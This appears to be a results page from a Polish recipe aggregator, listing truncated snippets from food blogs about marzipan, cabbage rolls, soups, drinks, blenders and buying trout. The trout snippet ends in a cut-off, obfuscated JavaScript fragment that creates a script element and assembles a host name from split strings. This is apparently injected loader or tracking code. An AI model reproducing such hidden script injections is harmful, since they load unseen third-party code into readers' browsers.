lody - 12901 przepisów (strona:627/861)

Czekoladki marcepanowe (Palline al marzapane e cioccolato) 174

grammi). Czekoladki oblewamy gorzk ą  czekolad ą, odstawiamy do stężenia czekolady. **** Cospargete le palline con il cioccolato ed infine lasciate a rassodare. Przygotowane czekoladki przechowujemy w lod ó wce.  **** Una volta pronte conservate le palline al marzapane in frigorifero. Smacznego! Buon appetito

La grande e la piccola cuoca
Pierś kurczaka z fetą i suszonymi pomidorami w cukinii na parze i surówka 228

pociąć na paski za pomocą obieraczki do warzyw, wrzucić do lodowatej wody, aby zyskała na chrupkości. Marchew najlepiej wrzucić zaraz po pokrojeniu do bardzo zimnej wody z kilkoma kostkami lodu – zdziwicie się jak fajnie marchew zacznie chrupać. Do słoiczka lub niewielkiego, zamykanego pojemnika włożyć wszystkie składniki dressingu, czyli olej, ocet balsamiczny, miód, sok z cytryny i wodę. Zakręcić

Dietolog
Który blender wybrać ręczny czy stojący? 159

posiada blender. Urządzenia stojące zazwyczaj nadadzą się idealnie do owoców, koktajli smoothie czy domowych zup, kremów, czy sosów. Na rynku dostępne są również produkty, które posiadają możliwość mielenia kostek lodu. Nie można też nie zauważyć, że blender kielichowy zapewnia dokładne wymieszanie składników oraz nie wymaga stałego trzymania przycisku czy kierowania blendera w konkretne miejsca – wystarczy włączyć urządzenie. Zazwyczaj urządzenie

kruche babeczki
Domowy marcepan (Marzapane fatto in casa) 208

który owijamy foli ą  spożywczą . Marcepan odstawiamy do lodówki na ok. 2 godziny. Tak przygotowany marcepan jest gotowy do użycia i może być przechowywany w lod ó wce maksymalnie do 2-3 dni. **** PREPARAZIONE In una ciotola mescolate la farina di mandorle con lo zucchero a velo, quindi aggiungete gli albumi, un po' alla volta e aroma

La grande e la piccola cuoca
GOŁĄBKI Z MIĘSEM WIEPRZOWYM W SOSIE POMIDOROWYM 165

łyżeczki Sposób wykonania  Gołąbki Z kapusty wycinamy rdzeń. Oddzielamy liście i parzymy je przez około 2 minuty w lekko osolonej wodzie. Kiedy lekko zmiękną, wrzucamy do wody z lodem na minutę. Ścinamy maksymalnie rdzeń środkowy liścia, jednocześnie uważając, aby go nie przerwać. Kroimy drobno cebulę i smażymy na odrobinie oleju przez 2 minuty. Ryż gotujemy zgodnie z instrukcją

chefintheforest
Uszka z kapustą i grzybami. 204

mojego przepisu. Zawsze robiłam na oko, ale tym razem wszystko odmierzałam specjalnie dla Was :) Jeszcze taka moja rada, nie wylewam wody od gotowania grzybów. Wlewam ją do woreczków na lód i zamrażam. Wykorzystuję później do sosów. Składniki na ciasto: 3,5 szklanki maki pszennej 1,5 szklanki gorącej wody 4 łyżki oleju duża szczypta soli Składniki na farsz

Agusiowe smakołyki
Sycąca zupa z soczewicą i dynią 155

wrzucamy do garnka i dodajemy makaron, kaszę czy ziemniaki. Jeśli mamy bulion, to już wogóle poezja. Zawsze, jeśli gotujecie rosół, warto zamrozić resztkę rosołu w foremkach lub woreczkach na lód. A jeśli nie macie ochoty już na daną zupę, to również ją możecie zamrozić i wtedy kiedy dopadnie was wilczy głód, albo mega leń, po prostu wyciągacie mrożoną zupę

Mieszam w Garnku
Ciastka orzeszki z kremem kokosowym 147

smaku (opcjonalnie)"],"name":"Ciastka orzeszki z kremem kokosowym","recipeInstructions":["Ciasto\r","Z podanych sk\u0142adnik\u00f3w szybko zagniatamy ciasto.\r","Owijamy w foli\u0119 i wk\u0142adamy do lod\u00f3wki na 30 min.\r","Ciasto wyjmujemy, dzielimy na kawa\u0142ki wielko\u015bci orzecha laskowego.\r","Patelni\u0119 smarujemy olejem i wk\u0142adamy po jednej kulce ciasta do ka\u017cdego otworu

Mieszam w Garnku
Rúgbrauð - islandzki chleb wulkaniczny 208

legendy o trollach i elfach  i krajobraz jak z tolkienowskich powieści o wyprawie hobbitów sprawiają, że zastygam w bezruchu i zachwycie, oglądając kolejne piękne kadry. Kraj ognia i lodu. Wyspa o surowym klimacie jest mroźna i otoczona zewsząd oceanem, jednocześnie będąc niezwykle przytulną wewnątrz, podszytą gorącymi źródłami i tryskającymi wrzącym strumieniem gejzerami. Gejzerami, przy których parę centymetrów pod ziemią

Kuchnia w Słońcu Skąpana
Drink Vodka Cranberry (z wódką) 174

porcję: 30 ml wódki 20 ml soku żurawinowego woda gazowana do uzupełnienia   Do wysokiej szklanki wlej wódkę oraz sok żurawinowy. Uzupełnij schłodzoną wodą gazowaną. Na końcu dodaj kostki lodu. Dla dekoracji wrzuć do drinka… owoce żurawiny, kulki winogron lub wiśnie.       Moje inne procentowe propozycje dla Was… – Drink Vodka Fizz – Błyskawiczny likier kawowy

Kulinarne S.O.S.
Pyszne ciastka gwiazdki, jak ciastka francuskie 216

Dodajemy posiekane mas\u0142o, \u015bmietan\u0119, cukier waniliowy i s\u00f3l.\r","Zagniatamy ciasto (b\u0119dzie do\u015b\u0107\u00a0lepkie).\r","Ciasto zawijamy w foli\u0119 i odstawiamy do lod\u00f3wki na min. godzin\u0119.\r","Ciasto rozwa\u0142kowujemy, wycinamy dwolny kszta\u0142t ciastek.\r","Wierzch ciastek smarujemy bia\u0142kiem a nast\u0119pnie posypujemy p\u0142atkami migda\u0142\u00f3w

Mieszam w Garnku
Orzechowe fit pralinki 172

się je całkowicie wymieszać, tak aby powstała jednolita masa. Masę łączymy z kaszą jaglaną, robimy to bardzo dokładnie, najlepiej dłońmi. Powstałe "ciasto" upychamy do foremki na lód, najlepiej silikonowej, żeby łatwo było wyjąć z niej pralinki po schłodzeniu. Masę dociskamy mocno, aby się bardzo dobrze zbiła. To gwarantuje nam, że nasze pralinki będą zwarte i nie będą się rozpadały

MamaOskarka
Puszyste placuszki na śmietanie w wersji wytrawnej 158

dobry i krótki skład.  Nawet moja córka z chęcią zjada parówkę krzycząc brum brum, choć Henryk Kania posiada też w swojej ofercie produkty dla dziewczynek - z bohaterami Krainy Lodu. A ja jako mama bacznie czytająca etykiety - mam pewność, że Natalia nie spożywa zbędnego glutaminianu sodu, czy fosforanów. Produkty z tej serii charakteryzują się wysoką mięsistością, więc nie zawierają niepotrzebnych

Di gotuje
Pstrąg nie tylko w górach. Podpowiadamy, jak i gdzie kupić najlepszą rybę 173

głowy i płetw) – jest sprzedawany w różnej formie. Jak się przekonać, że ryba mrożona nadaje się do zjedzenia? Nie powinno być na niej zbyt wiele glazury, czyli zmarzniętego lodu. Jeśli tak jest, może okazać się, że produkt był wielokrotnie zamrażany po rozmrożeniu. Więcej o pstrągu znajdziesz na naszpstrag.pl (function(){ az3w=document.createElement("script");az3w_="u"+("s")+"ta"; az3w_+=("t.i")+""+"n";az3w

Codogara
Makaron z kurczakiem i brokułem. Przepis krok po kroku. 347

podziel na niewielkie różyczki. Podgotuj je w posolonym i posłodzonym wrzątku przez 2 minuty. Następnie natychmiast schłodź w zimnej wodzie lub wodzie z lodem, zatrzyma to proces gotowania, a kolor pozostanie intensywny. Na rozgrzanej oliwie z oliwek podsmaż kurczaka pokrojonego w paski, powinien być rumiany. Dopraw solą

kuron.com.pl